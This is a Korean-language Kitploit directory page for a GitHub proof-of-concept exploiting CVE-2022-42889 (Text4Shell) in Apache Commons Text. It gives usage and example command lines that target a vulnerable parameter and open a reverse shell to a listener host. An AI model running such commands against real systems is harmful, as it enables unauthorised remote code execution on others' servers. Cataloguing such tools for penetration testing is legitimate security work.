Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-42889-text4shell — Proof of Concept (PoC) for CVE-2022-42889 (Text4Shell) targeting Apache Commons Text versions prior to 1.10.0. This script automates Remote Code Execution (RCE) via script interpolation to establish a reverse shell. This version is a structured optimization based on the original exploit found at Exploit-DB (ID: 52261). | Kitploit
도구/GitHubGitHub/goultarde/cve-2022-42889-text4shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubgoultarde/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

Proof of Concept (PoC) for CVE-2022-42889 (Text4Shell) targeting Apache Commons Text versions prior to 1.10.0. This script automates Remote Code Execution (RCE) via script interpolation to establish a reverse shell. This version is a structured optimization based on the original exploit found at Exploit-DB (ID: 52261).

저장소 보기
1개월 전아직 검토되지 않음
공유

CVE-2022-42889-text4shell

설명

이 스크립트는 Apache Commons Text(버전 < 1.10.0) 내의 Text4Shell로도 알려진 CVE-2022-42889 취약점을 악용하도록 설계된 침투 테스트 도구입니다. 리버스 셸을 트리거하기 위해 Java 기반 페이로드를 전달하는 과정을 자동화합니다.

이 구현은 공개 익스플로잇을 기반으로 합니다: https://www.exploit-db.com/exploits/52261

기능

  • 더 나은 사용성을 위한 argparse를 사용한 명령줄 인수.
  • Java 페이로드 호환성을 위한 정확한 URL 인코딩.
  • 사용자 정의 가능한 경로 및 취약한 매개변수 대상.

사용법

사전 요구사항

이 스크립트는 Python 3와 requests 라이브러리가 필요합니다.

root@kitploit:~
pip install requests

구문

root@kitploit:~
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT

예시

root@kitploit:~
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139

면책 조항

이 도구는 교육 목적과 공인된 침투 테스트만을 위해 제작되었습니다. 저자는 이 스크립트로 인한 오용이나 피해에 대해 책임을 지지 않습니다.

도구 다운로드